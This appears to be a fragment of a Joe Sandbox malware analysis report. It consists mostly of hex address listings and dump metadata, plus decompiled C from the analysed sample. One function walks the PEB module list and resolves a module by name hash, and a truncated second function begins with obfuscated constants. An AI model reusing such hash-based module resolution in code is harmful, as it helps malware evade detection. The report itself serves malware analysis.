0x001161ae
0x001161b9
0x001161ba
0x001161bd
0x001161c0
0x001161c2
0x00000000
0x00000000
0x001161c8
0x001161c9
0x001161cb
0x00000000
0x001161d1
0x001161d1
0x001161d1
0x00000000
0x001161d1
0x00000000
0x001161cb
0x00000000
0x001161a0
0x00116177
0x00116177
0x00116177
0x0011617a
0x0011617c
0x00000000
0x00116182
0x00116182
0x00116182
0x00116184
0x00000000
0x0011618a
0x0011618a
0x00000000
0x0011618a
0x00116184
0x0011617c
0x00000000
0x00115404
0x00115404
0x0011540b
0x00115413
0x00115418
0x00000000
0x00000000
0x0011541a
0x0011541c
0x0011541f
0x00115451
0x00115451
0x00115453
0x00115455
0x0011545c
0x00115463
0x00115466
0x00115469
0x0011546e
0x001154ae
0x001154b1
0x001154b4
0x001154b9
0x001154c5
0x001154c5
0x001154cd
0x001154d5
0x001154d8
0x001154dc
0x001154df
0x001154e1
0x001154e4
0x0011551f
0x0011551f
0x00115522
0x00115586
0x00115586
0x0011558b
0x00115590
0x00115590
0x00115593
0x00115596
0x0011559c
0x0011559f
0x001155a3
0x001155a6
0x001155a9
0x001155ac
0x001155ac
0x001155b1
0x001155b4
0x001155b7
0x001155ba
0x001155bd
0x001155c0
0x001155c2
0x001155c4
0x001155c4
0x001155c9
0x001155ca
0x001155cc
0x001155ce
0x001155d1
0x001155d4
0x00000000
0x00000000
0x00000000
0x001155d4
0x00115524
0x00115524
0x00115524
0x00115527
0x00000000
0x00115529
0x00115529
0x00115529
0x0011552e
0x00115534
0x00115536
0x00115539
0x00115540
0x00115540
0x00115542
0x00115544
0x00115547
0x0011554a
0x0011554d
0x00115550
0x00115550
0x00115554
0x00115557
0x0011555d
0x00115560
0x00115563
0x00115566
0x00115569
0x0011556c
0x00000000
0x0011556e
0x0011556e
0x0011556e
0x00115570
0x00115572
0x00115572
0x00115577
0x00115578
0x0011557a
0x0011557c
0x0011557f
0x00115582
0x00115584
0x001155d6
0x001155d6
0x001155db
0x001155df
0x001155e2
0x001155e2
0x001155e5
0x001155e5
0x001155e5
0x001155e5
0x001155e5
0x00115570
0x0011556c
0x00115527
0x00000000
0x001154e6
0x001154e6
0x001154e6
0x001154e6
0x001154e8
0x001154e9
0x001154ee
0x00000000
0x00000000
0x001154f4
0x001154fa
0x001161ff
0x001161ff
0x00116206
0x00000000
0x00115500
0x00115500
0x00115512
0x00115515
0x00115518
0x0011551a
0x00000000
0x0011551a
0x00000000
0x001154fa
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x001155f6
0x001155fc
0x001155ff
0x00115602
0x00000000
0x00115608
0x00115608
0x00115608
0x0011560b
0x0011560d
0x00115611
0x00115613
0x00115616
0x0011561e
0x00115623
0x00115626
0x00115626
0x00115629
0x00115629
0x00115633
0x0011563b
0x0011563e
0x00115640
0x00115649
0x00115649
0x0011564e
0x0011564f
0x00115650
0x00115651
0x00115651
0x00115655
0x00115657
0x0011565b
0x0011565d
0x00115665
0x00115665
0x00115669
0x0011566c
0x00115642
0x00115642
0x00115644
0x00115644
0x0011566f
0x0011566f
0x00115671
0x00115673
0x00115676
0x00115679
0x0011567f
0x0011584a
0x0011584a
0x00115850
0x00115853
0x00115859
0x001160f6
0x001160f6
0x001160fd
0x00116103
0x00116109
0x0011610c
0x0011610f
0x00116111
0x0011614e
0x0011614e
0x00116151
0x00115404
0x0011540b
0x00115413
0x00115418
0x00000000
0x00000000
0x00000000
0x00116157
0x00116157
0x0011615c
0x0011615f
0x001161d6
0x001161d6
0x001161dd
0x001161e0
0x001161e3
0x001161e8
0x001161ee
0x001161f1
0x001161f4
0x001161f7
0x00115404
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0011615f
0x00116113
0x00116113
0x00116113
0x00116115
0x0011613a
0x0011613f
0x0011613f
0x00116144
0x00116146
0x00116148
0x00116148
0x00116148
0x0011614b
0x00000000
0x00116117
0x00116117
0x00116117
0x00116117
0x0011611a
0x00000000
0x00000000
0x00116120
0x00116125
0x00116127
0x00116128
0x0011612b
0x0011612d
0x00116130
0x00116133
0x00116136
0x00116138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00116138
0x00116331
0x00116331
0x00000000
0x00116331
0x00116115
0x0011585f
0x0011585f
0x0011585f
0x0011585f
0x00115863
0x00000000
0x00000000
0x00115869
0x00115869
0x0011586c
0x0011588f
0x00115891
0x00115894
0x00115897
0x0011589a
0x0011589d
0x0011589d
0x0011589f
0x001158a2
0x001158a5
0x001158a8
0x00115a6b
0x00115a6b
0x00115a6e
0x00116364
0x00116364
0x0011636b
0x00000000
0x00115a74
0x00115a74
0x00115a74
0x00115a77
0x00115b46
0x00115b46
0x00115b46
0x00115b48
0x00115b48
0x00115b48
0x00115b4b
0x00115b4e
0x00000000
0x00000000
0x00115b54
0x00115b54
0x00115b5b
0x00115b5e
0x00115b60
0x00115b8f
0x00115b8f
0x00115b9a
0x00115ba2
0x00115ba5
0x00115ba8
0x00115baf
0x00115bb1
0x00115bb3
0x00115bb5
0x00115bb8
0x00115bc2
0x00115bc5
0x00115bc7
0x00115bca
0x00000000
0x00115b62
0x00115b62
0x00115b62
0x00115b62
0x00115b65
0x00000000
0x00000000
0x00115b6b
0x00115b70
0x00115b72
0x00115b73
0x00115b76
0x00115b78
0x00115b7b
0x00115b7e
0x00115b81
0x00115b88
0x00115b8b
0x00115b8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115b8d
0x00116285
0x00116285
0x00000000
0x00116285
0x00000000
0x00115b60
0x00115bd0
0x00115bd5
0x00115bde
0x00115be4
0x00115be7
0x00115bea
0x00115bea
0x00115bec
0x00115bec
0x00115bec
0x00115bef
0x00115bf2
0x00000000
0x00000000
0x00115bf4
0x00115bf4
0x00115bf7
0x00115c1a
0x00115c1f
0x00115c22
0x00115c25
0x00115c28
0x00115c2b
0x00115c2e
0x00115c35
0x00115c3f
0x00000000
0x00115bf9
0x00115bf9
0x00115bf9
0x00115bf9
0x00115bfc
0x00000000
0x00000000
0x00115c02
0x00115c07
0x00115c09
0x00115c0a
0x00115c0c
0x00115c0f
0x00115c12
0x00115c15
0x00115c18
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115c18
0x00116290
0x00116290
0x00000000
0x00116290
0x00000000
0x00115bf7
0x00115c42
0x00115c42
0x00000000
0x00115a7d
0x00115a7d
0x00115a7d
0x00115a82
0x00115a83
0x00115a84
0x00115a85
0x00115a86
0x00115a88
0x00115a8a
0x00115a8c
0x00115a8d
0x00115a8f
0x00115a91
0x00115a98
0x00115a9e
0x00115aa6
0x00115aa9
0x00115aae
0x00115ab3
0x00115ab8
0x00115abd
0x00115ac5
0x00115acd
0x00115ad5
0x00115add
0x00115ae5
0x00115aeb
0x00115af3
0x00115af7
0x00115afc
0x00115b01
0x00115b06
0x00115b0b
0x00115b10
0x00115b15
0x00115b1d
0x00115b22
0x00115b2a
0x00115b34
0x00115b3e
0x00115c49
0x00115c49
0x00115c49
0x00115c4c
0x00115c4e
0x00000000
0x00000000
0x00115c54
0x00115c63
0x00115c6d
0x00115c83
0x00115c99
0x00115ca2
0x00115ca7
0x00115caa
0x00115cad
0x00115cb0
0x00115cb2
0x00115cb4
0x00115cb4
0x00115cc0
0x00115cc0
0x00115cc0
0x00115cc4
0x00115cc5
0x00115ccc
0x00115ccc
0x00115cc0
0x00115cd0
0x00115cd0
0x00115cd5
0x00115cd6
0x00115cd7
0x00115cd8
0x00115cd9
0x00115cd9
0x00115cdf
0x00115ce5
0x00115ce8
0x00115cf0
0x00115cf0
0x00115cf0
0x00115cf9
0x00115cfb
0x00115cfd
0x00115d04
0x00115d07
0x00115d10
0x00115d17
0x00115d19
0x00115d1c
0x00115d25
0x00115d27
0x00115d2e
0x00115d31
0x00115d31
0x00115d3c
0x00115d3f
0x00115d45
0x00115d48
0x00115d4a
0x00115d51
0x00115d5c
0x00115d5c
0x00115d5f
0x00115d66
0x00115d6d
0x00115d70
0x00115d76
0x00115d76
0x00115d80
0x00115d80
0x00115d85
0x00115d85
0x00115d89
0x00115d8c
0x00115d8e
0x00115d94
0x00115d94
0x00115d9b
0x00115d9f
0x00115da6
0x00115da9
0x00115dab
0x00000000
0x00115db0
0x00115db0
0x00115dbb
0x00115dbe
0x00115dbf
0x00115dc1
0x00115dc4
0x00115dc4
0x00115dc8
0x00115dc8
0x00115dcb
0x00115dcb
0x00115dce
0x00115e1d
0x00115e2d
0x00115e30
0x00115e33
0x00115e36
0x00115e39
0x00115e3c
0x00115e3e
0x00115e43
0x00115e46
0x00115e48
0x00115e48
0x00115e4b
0x00115e4e
0x00115e4e
0x00115e51
0x00115e51
0x00115e54
0x00115e57
0x00115e59
0x00115e59
0x00115e59
0x00115e5c
0x00115e5f
0x00115e62
0x00115e62
0x00115e62
0x00115e70
0x00115e75
0x00115e79
0x00115e7c
0x00115e94
0x00115e7e
0x00115e81
0x00115e85
0x00115e88
0x00115e8a
0x00115e8d
0x00115e90
0x00115e90
0x00115e97
0x00115e97
0x00115e97
0x00115e97
0x00115e97
0x00115e9c
0x00115e9f
0x00115e9f
0x00115ea1
0x00115ea6
0x00115ea6
0x00115eab
0x00115dd0
0x00115dd0
0x00115dd7
0x00115dda
0x00115ddd
0x00115de3
0x00115de9
0x00115de9
0x00115dee
0x00115def
0x00115df0
0x00115df1
0x00115df1
0x00115df6
0x00115dff
0x00115dff
0x00115e05
0x00115e05
0x00115e05
0x00115e08
0x00115e0a
0x00115e0d
0x00115e0d
0x00115e15
0x00115e15
0x00115de3
0x00115dce
0x00115eb3
0x00115eb3
0x00115eb6
0x00115eb7
0x00115eb7
0x00115ec1
0x00115ec6
0x00115ec6
0x00115ec7
0x00115ec7
0x00115ecb
0x001160e6
0x001160e6
0x00000000
0x00115ed1
0x00115ed1
0x00115ed1
0x00115ed1
0x00115ed3
0x00115ed3
0x00115ed3
0x00115ed6
0x00115ed6
0x00115edc
0x00115edf
0x00115ee1
0x00000000
0x00000000
0x00115ee7
0x00115ee7
0x00115eea
0x00115fa2
0x00115fa9
0x00115fb1
0x00115fb4
0x00115fb6
0x00115fc7
0x00000000
0x00115fd0
0x00115fd0
0x00115fd0
0x00115fd5
0x00115fd7
0x00115fde
0x00115fe6
0x00115fe9
0x00115fe9
0x00115fb8
0x00115fb8
0x00115fba
0x00115fbd
0x00115fc2
0x00115fc2
0x00115fed
0x00115fed
0x00115fef
0x00115ff1
0x00115ff4
0x00115ff7
0x00115ffa
0x0011600c
0x0011600c
0x0011601c
0x0011601c
0x00116023
0x00116026
0x00116028
0x00116050
0x0011605e
0x00116061
0x00116068
0x0011606b
0x0011606d
0x00116071
0x00116074
0x00116077
0x00116083
0x00116083
0x00116079
0x00116079
0x00116079
0x00116085
0x00116090
0x00116099
0x0011609c
0x0011609e
0x00115ed3
0x00115ed3
0x00000000
0x0011602a
0x0011602a
0x0011602a
0x0011602a
0x0011602d
0x00000000
0x00000000
0x00116033
0x00116038
0x0011603a
0x0011603b
0x0011603e
0x00116040
0x00116043
0x00116046
0x00116049
0x0011604b
0x00000000
0x0011604d
0x0011604d
0x0011604d
0x00000000
0x0011604d
0x00000000
0x0011604b
0x001162a6
0x001162a6
0x00000000
0x001162a6
0x0011600e
0x0011600e
0x0011600e
0x00116011
0x00116013
0x00116388
0x00116388
0x0011638b
0x00000000
0x00116019
0x00116019
0x00116019
0x00000000
0x00116019
0x00116013
0x00115ffc
0x00115ffc
0x00115ffc
0x00115fff
0x00116006
0x00000000
0x00116006
0x00115ef0
0x00115ef0
0x00115ef5
0x00115ef8
0x00115f7e
0x00115f7e
0x00115f85
0x00115f88
0x00115f8d
0x00115f93
0x00115f96
0x00115f99
0x00115f99
0x00115f9c
0x00000000
0x00115efe
0x00115efe
0x00115efe
0x00115f00
0x00115f05
0x00115f0d
0x00115f0f
0x00115f22
0x00115f22
0x00115f25
0x00000000
0x00115f27
0x00115f27
0x00115f2c
0x00115f2c
0x00115f30
0x00115f30
0x00115f3e
0x00115f49
0x00115f4a
0x00115f4d
0x00115f4f
0x00000000
0x00000000
0x00115f51
0x00115f51
0x00115f54
0x00115f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115f56
0x00000000
0x00115f30
0x00115f11
0x00115f11
0x00115f11
0x00115f14
0x00115f16
0x00115f58
0x00115f58
0x00115f5b
0x00115f5b
0x00115f5e
0x0011629b
0x0011629b
0x00000000
0x00000000
0x00000000
0x00000000
0x00115f18
0x00115f18
0x00115f18
0x00115f1a
0x00115f9f
0x00115f9f
0x00000000
0x00115f20
0x00115f20
0x00000000
0x00115f20
0x00115f1a
0x00115f16
0x00000000
0x00115f64
0x00115f67
0x00115f69
0x00115f6b
0x00115f6c
0x00115f6e
0x00115f71
0x00115f74
0x00115f77
0x00115f77
0x00000000
0x00115f7c
0x00115ef8
0x00000000
0x00115eea
0x001160a6
0x001160a9
0x001160ac
0x001160ae
0x001160b0
0x00116396
0x00116396
0x00116399
0x00000000
0x001160b6
0x001160b6
0x001160c2
0x001160d3
0x001160d3
0x001160dd
0x001160e3
0x00000000
0x001160e3
0x00000000
0x001160b0
0x00115ed3
0x00115d53
0x00115d53
0x00115d53
0x00115d56
0x00116376
0x00116376
0x0011637d
0x00000000
0x00000000
0x00000000
0x00000000
0x00115d56
0x00000000
0x00115d51
0x001160ee
0x001160ee
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x00000000
0x001155e8
0x00115a77
0x001158ae
0x001158ae
0x001158b0
0x001158b3
0x001158b5
0x001158dc
0x001158de
0x001158e1
0x001158e3
0x001158e5
0x001158e8
0x001158e8
0x001158ea
0x001158ea
0x001158ea
0x001158ed
0x001158f0
0x00000000
0x00000000
0x001158f2
0x001158f2
0x001158f4
0x00115932
0x00115932
0x00115935
0x0011624f
0x0011624f
0x00000000
0x0011593b
0x0011593b
0x0011593b
0x0011593d
0x0011593e
0x00115945
0x00115946
0x00000000
0x00115946
0x001158f6
0x001158f6
0x001158f6
0x001158f9
0x0011591f
0x0011591f
0x00115926
0x00115929
0x0011592c
0x0011592d
0x00000000
0x001158fb
0x001158fb
0x001158fb
0x001158fb
0x001158fe
0x00000000
0x00000000
0x00115904
0x00115909
0x0011590b
0x0011590c
0x0011590e
0x00115911
0x00115914
0x00115917
0x0011591a
0x00000000
0x0011591c
0x0011591c
0x0011591c
0x00000000
0x0011591c
0x00000000
0x0011591a
0x00116244
0x00116244
0x00000000
0x00116244
0x001158f9
0x00000000
0x001158f4
0x0011594b
0x0011595e
0x00115965
0x0011597a
0x0011597d
0x00116352
0x00116352
0x00116359
0x00000000
0x00115983
0x00115983
0x00115983
0x00115986
0x00115986
0x00115986
0x00115988
0x00000000
0x00000000
0x0011598e
0x0011598e
0x00115990
0x001159ec
0x001159ec
0x001159ef
0x001159ef
0x001159ef
0x001159f1
0x00000000
0x00000000
0x00115a01
0x00115a01
0x00115a04
0x00115a06
0x00115a20
0x00115a20
0x00115a23
0x00115a25
0x00116277
0x00116277
0x0011627a
0x00000000
0x00115a2b
0x00115a2b
0x00115a2b
0x00115a30
0x00115a32
0x00115a36
0x00115a39
0x00115a3b
0x00115a44
0x00115a3d
0x00115a3d
0x00115a3f
0x00115a3f
0x00115a46
0x00115a4b
0x00115a4b
0x00115a54
0x00115a59
0x00115a5b
0x00115a5e
0x00115a61
0x00115a63
0x00115a66
0x00000000
0x00115a66
0x00115a08
0x00115a08
0x00115a08
0x00115a0b
0x00115a12
0x00000000
0x00115a12
0x00000000
0x00115a06
0x001159f3
0x001159f3
0x001159f8
0x00000000
0x00115992
0x00115992
0x00115992
0x00115995
0x001159b8
0x001159b8
0x001159bb
0x001159be
0x001159c1
0x001159c4
0x001159cc
0x001159cf
0x001159d2
0x001159d5
0x00116265
0x00116265
0x0011626c
0x00000000
0x001159db
0x001159db
0x001159de
0x001159e1
0x001159e6
0x001159e7
0x00000000
0x001159e7
0x00115997
0x00115997
0x00115997
0x00115997
0x0011599a
0x00000000
0x00000000
0x001159a0
0x001159a5
0x001159a7
0x001159a8
0x001159aa
0x001159ad
0x001159b0
0x001159b3
0x001159b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001159b6
0x0011625a
0x0011625a
0x00000000
0x0011625a
0x00115995
0x00000000
0x00115990
0x00000000
0x00115986
0x001158b7
0x001158b7
0x001158b7
0x001158b7
0x001158ba
0x00000000
0x00000000
0x001158c0
0x001158c5
0x001158c7
0x001158ca
0x001158cc
0x001158cf
0x001158d2
0x001158d5
0x001158d8
0x001158da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001158da
0x00116239
0x00116239
0x00000000
0x00116239
0x001158b5
0x0011586e
0x0011586e
0x0011586e
0x0011586e
0x00115871
0x00000000
0x00000000
0x00115877
0x0011587c
0x0011587e
0x0011587f
0x00115881
0x00115884
0x00115887
0x0011588a
0x0011588d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0011588d
0x0011622e
0x0011622e
0x00000000
0x0011622e
0x00000000
0x0011586c
0x001162b1
0x001162b3
0x001162b6
0x001162b8
0x001162e2
0x001162e2
0x001162e7
0x001162ea
0x001162ec
0x001162ee
0x001162f1
0x001162f3
0x001162f5
0x001162f5
0x001162f5
0x001162f8
0x00000000
0x00000000
0x001162fa
0x001162fa
0x001162fb
0x001162fe
0x00116300
0x00000000
0x00000000
0x00000000
0x00116300
0x001162f5
0x00116302
0x00116307
0x00116307
0x0011630b
0x0011630e
0x00116311
0x00116314
0x00116316
0x00116319
0x0011631d
0x00116320
0x00116324
0x00116442
0x00116442
0x00116442
0x00116444
0x00000000
0x0011632a
0x0011632a
0x0011632a
0x001163f3
0x001163f3
0x001163f3
0x001163f6
0x001163f9
0x00000000
0x00000000
0x001163fb
0x001163fb
0x001163fd
0x0011640a
0x0011640a
0x0011640d
0x00116410
0x001163d7
0x001163d7
0x001163dd
0x001163dd
0x001163e0
0x00000000
0x00116412
0x00116412
0x001163ba
0x001163ba
0x001163ba
0x001163bd
0x00000000
0x00000000
0x001163bf
0x001163c4
0x001163c6
0x001163c9
0x001163cb
0x001163cc
0x001163cf
0x001163d2
0x00000000
0x001163d4
0x001163d4
0x001163d4
0x00000000
0x001163d4
0x00000000
0x001163d2
0x0011641c
0x0011641c
0x00000000
0x0011641c
0x001163ff
0x001163ff
0x001163ff
0x00116402
0x00116414
0x00116414
0x00000000
0x00116404
0x00116404
0x00116404
0x00116407
0x001163e3
0x001163e3
0x001163ec
0x001163ef
0x001163ef
0x001163f0
0x00000000
0x001163f0
0x00116402
0x00000000
0x001163fd
0x00000000
0x001163f3
0x001162c0
0x00000000
0x001162c0
0x001162c0
0x001162c0
0x001162c3
0x00000000
0x00000000
0x001162c9
0x001162d0
0x001162d3
0x001162d5
0x001162d8
0x001162db
0x001162de
0x001162e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001162e0
0x001163b2
0x001163b2
0x00000000
0x001163b2
0x001162b8
0x00115685
0x00115685
0x00115685
0x00115688
0x0011568a
0x0011568e
0x00115690
0x00115693
0x00115696
0x0011569e
0x001156a3
0x001156a6
0x001156a6
0x001156a9
0x001156a9
0x001156b3
0x001156bb
0x001156be
0x001156c0
0x001156c9
0x001156c9
0x001156ce
0x001156cf
0x001156d0
0x001156d1
0x001156d1
0x001156d5
0x001156d7
0x001156dd
0x001156e5
0x001156e5
0x001156e9
0x001156ec
0x001156c2
0x001156c2
0x001156c4
0x001156c4
0x001156ef
0x001156ef
0x001156f2
0x001156f4
0x001156f9
0x001156fc
0x001156fe
0x00115701
0x00115707
0x00115847
0x00115847
0x00115847
0x00115847
0x00000000
0x0011570d
0x0011570d
0x0011570d
0x00115710
0x00115716
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x001155e8
0x00115707
0x0011567f
0x00000000
0x0011571e
0x0011571e
0x00115721
0x001157d3
0x001157da
0x001157e2
0x001157e5
0x001157e7
0x001157f8
0x001157f8
0x001157fd
0x001157fe
0x001157ff
0x00115800
0x00115800
0x00115804
0x00115806
0x0011580a
0x0011580c
0x00115814
0x00115814
0x00115818
0x0011581b
0x001157e9
0x001157e9
0x001157eb
0x001157ee
0x001157f3
0x001157f3
0x0011581e
0x0011581e
0x00115820
0x00115822
0x00115825
0x00115828
0x0011582e
0x00000000
0x00115830
0x00115830
0x00115830
0x00115833
0x00115836
0x0011621c
0x0011621c
0x00116223
0x00000000
0x0011583c
0x0011583c
0x0011583c
0x0011583f
0x00000000
0x0011583f
0x00115836
0x00115727
0x00115727
0x00115727
0x0011572a
0x001157af
0x001157af
0x001157b6
0x001157b9
0x001157be
0x001157c4
0x001157c7
0x001157ca
0x001157ca
0x001157cd
0x00000000
0x00115730
0x00115730
0x00115730
0x00115732
0x00115737
0x0011573f
0x00115741
0x00115754
0x00115754
0x00115757
0x00000000
0x00115759
0x00115759
0x0011575e
0x00115761
0x00115761
0x0011576f
0x0011577a
0x0011577b
0x0011577e
0x00115780
0x00000000
0x00000000
0x00115782
0x00115782
0x00115785
0x00115787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115787
0x00000000
0x00115761
0x00115743
0x00115743
0x00115743
0x00115746
0x00115748
0x00115789
0x00115789
0x0011578c
0x0011578c
0x0011578f
0x00116211
0x00116211
0x00000000
0x00000000
0x00000000
0x00000000
0x0011574a
0x0011574a
0x0011574a
0x0011574c
0x001157d0
0x001157d0
0x00000000
0x00115752
0x00115752
0x00000000
0x00115752
0x0011574c
0x00115748
0x00000000
0x00115795
0x00115798
0x0011579a
0x0011579c
0x0011579d
0x0011579f
0x001157a2
0x001157a5
0x001157a8
0x001157a8
0x00000000
0x001157ad
0x0011572a
0x00000000
0x00115721
0x001155e8
0x001163a4
0x001163a4
0x001163a4
0x001163a7
0x0011644a
0x0011644a
0x00000000
0x0011644a
0x00115470
0x00115470
0x00115472
0x00115497
0x0011549c
0x001154a1
0x001154a3
0x001154a5
0x001154a8
0x001154ab
0x00000000
0x00115474
0x00000000
0x00115474
0x00115482
0x00115484
0x00115485
0x00115488
0x0011548a
0x0011548d
0x00115490
0x00115495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115495
0x0011633c
0x00116422
0x00116422
0x0011642b
0x00116430
0x00116430
0x00116433
0x00116436
0x00116439
0x0011643b
0x0011643b
0x0011643e
0x00116440
0x0011644d
0x0011644d
0x00116450
0x00116452
0x00116454
0x00116454
0x00116454
0x00116457
0x00000000
0x00000000
0x00116459
0x00116459
0x0011645a
0x0011645d
0x0011645f
0x00000000
0x00000000
0x00000000
0x0011645f
0x00116454
0x00116452
0x0011643e
0x00116439
0x00115472
0x00000000
0x00115426
0x00115426
0x0011542b
0x0011542c
0x0011542d
0x00115430
0x00115430
0x00115434
0x00115436
0x0011543c
0x00115444
0x00115444
0x00115448
0x0011544b
0x0011544e
0x00000000
0x0011544e
0x00115404
0x00116461
0x00116461
0x00116464
0x00116466
0x0011646b
0x0011646e
0x00116471
0x00116474
0x00116476
0x00116479
0x00116483
0x0011648e
0x00116491
0x00116495
0x0011649b
0x001164a1
0x001164a7
0x001164aa
0x001164ad
0x001164b2
0x001164b5
0x001164b7
0x001164bd
0x001164bd
0x001164bf
0x001164c5
0x001164c5
0x001164cf
0x001164d5
0x001164de
0x001164e1
0x001164e4
0x001164e6
0x001164ea
0x001164ed
0x001164f3
0x001164f3
0x001164f5
0x001164f5
0x001164f5
0x001164f7
0x001164fa
0x001164fd
0x00116503
0x00116503
0x00116508
0x00116509
0x0011650a
0x0011650b
0x0011650b
0x0011650b
0x00116510
0x00116510
0x00116513
0x00116516
0x00116521
0x0011652c
0x00116537
0x00116542
0x0011654d
0x00116558
0x00116563
0x00116568
0x0011656b
0x0011656d
0x00116572
0x00116574
0x00116574
0x00116579
0x0011657c
0x0011657c
0x0011657f
0x0011657f
0x00116581
0x00116584
0x00116586
0x00116588
0x0011658c
0x0011658f
0x00116591
0x00116591
0x00116596
0x0011659e
0x001165a2
0x001165a2
0x001165a6
0x001165b0
0x001165b0
0x001165b3
0x001165b5
0x001165b9
0x001165bb
0x001165be
0x001165c0
0x001165c2
0x001165c2
0x001165c2
0x001165c5
0x001165c8
0x001165cb
0x001165ce
0x001165d1
0x001165d1
0x001165d4
0x001165d4
0x001165d6
0x001165d8
0x001165de
0x001165e0
0x001165e2
0x001165e2
0x001165e3
0x001165e3
0x001165e6
0x001165e9
0x001165eb
0x001165eb
0x001165eb
0x001165ed
0x001165f2
0x001165fd
0x00116609
0x0011660f
0x00116611
0x00116611
0x00116611
0x00116614
0x00116619
0x0011661c
0x0011661c
0x00116625
0x0011662a
0x0011662a
0x0011662b
0x0011662e
0x00116630
0x00116633
0x00116635
0x00116637
0x0011663b
0x0011663d
0x00116645
0x00116645
0x0011663b
0x00116635
0x001164bf
0x00116648
0x00116650
0x00000000
0x00116650
0x00116347
0x00116347
0x00000000

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e4208f9e52747629ee9f13084cffd016769f923a52c92f36d846e1524a360e
Instruction ID: 7bcba586c0eb8f2943688c13a8abe68a4f72a52cfe1dce99ab983f9282437461
Opcode Fuzzy Hash: a7e4208f9e52747629ee9f13084cffd016769f923a52c92f36d846e1524a360e
Instruction Fuzzy Hash: 4E126D71E0462ADBCF1DCF69C8A02FDBBB2BF94300F25417AD866A7644D7349981DB90

Uniqueness

Uniqueness Score: 0.00%

Function 00111550, Relevance: .0, Instructions: 38
COMMON

C-Code - Quality: 72%

			E00111550(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _t6;
				signed int _t7;
				intOrPtr* _t10;
				signed int _t13;
				intOrPtr* _t16;
				signed short* _t18;

				_push(__ecx);
				_t6 =  *[fs:0x30];
				_t10 =  *((intOrPtr*)(_t6 + 0xc)) + 0xc;
				_v8 = __ecx;
				_t16 =  *_t10;
				if(_t16 == _t10) {
					L9:
					goto 0x30021e;
					asm("int3");
					asm("int3");
					asm("int3");
					return _t6;
				} else {
					do {
						_t18 =  *(_t16 + 0x30);
						_t13 = 0;
						_t6 =  *_t18 & 0x0000ffff;
						while(_t6 != 0) {
							_t4 = _t6 - 0x41; // -17
							_t7 = _t6 & 0x0000ffff;
							if(_t4 <= 0x19) {
								_t7 = _t7 + 0x20;
							}
							_t18 =  &(_t18[1]);
							_t13 = _t13 * 0x1003f + _t7;
							_t6 =  *_t18 & 0x0000ffff;
						}
						if(_t13 == _v8) {
							goto 0x300234;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							return _t6;
						} else {
							goto L8;
						}
						goto L11;
						L8:
						_t16 =  *_t16;
					} while (_t16 != _t10);
					goto L9;
				}
				L11:
			}

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 935277d2f5803dd89d7bcba5a9ab1168837677844d7f66c4fec1179c28e1e5fb
Instruction ID: fb457cbfd2eb0abfa5491bcbb12417ad1a68c695626dca2839c0fac99e491c0e
Opcode Fuzzy Hash: 935277d2f5803dd89d7bcba5a9ab1168837677844d7f66c4fec1179c28e1e5fb
Instruction Fuzzy Hash: 0BF0F432900105ABCB68DF0AC9806F9F3ABFFD5384B994069EA4657240EB34AD81C660

Uniqueness

Uniqueness Score: 0.00%

Function 0011717A, Relevance: 39.0, APIs: 3, Strings: 19, Instructions: 467
memorylibraryUNIQUE

C-Code - Quality: 97%

			E0011717A(void* __esi, void* __eflags) {
				int _t452;
				void* _t454;
				intOrPtr _t456;
				void* _t459;
				void* _t461;
				void* _t462;
				void* _t463;

				 *((intOrPtr*)(_t463 - 0x6fc)) = 0xda13a380;
				 *((intOrPtr*)(_t463 - 0x6f8)) = 0x4a2d724d;
				 *((intOrPtr*)(_t463 - 0x6f4)) = 0xbbbef731;
				 *((intOrPtr*)(_t463 - 0x6f0)) = 0x335bc7e2;
				 *((intOrPtr*)(_t463 - 0x6ec)) = 0xfe1b3ebb;
				 *((intOrPtr*)(_t463 - 0x6e8)) = 0x1517088;
				 *((intOrPtr*)(_t463 - 0x6e4)) = 0xc306eafb;
				 *((intOrPtr*)(_t463 - 0x6e0)) = 0xe7eb6c1f;
				 *((intOrPtr*)(_t463 - 0x6dc)) = 0x38670867;
				 *((intOrPtr*)(_t463 - 0x6d8)) = 0xcd989c2d;
				 *((intOrPtr*)(_t463 - 0x6d4)) = 0x22f5ead6;
				 *((intOrPtr*)(_t463 - 0x6d0)) = 0xf84e10bf;
				 *((intOrPtr*)(_t463 - 0x6cc)) = 0xdc8796e2;
				 *((intOrPtr*)(_t463 - 0x6c8)) = 0x369fd1c8;
				 *((intOrPtr*)(_t463 - 0x6c4)) = 0x2b6014cc;
				 *((intOrPtr*)(_t463 - 0x6c0)) = 0x37772353;
				 *((intOrPtr*)(_t463 - 0x6bc)) = 0x1fdd8645;
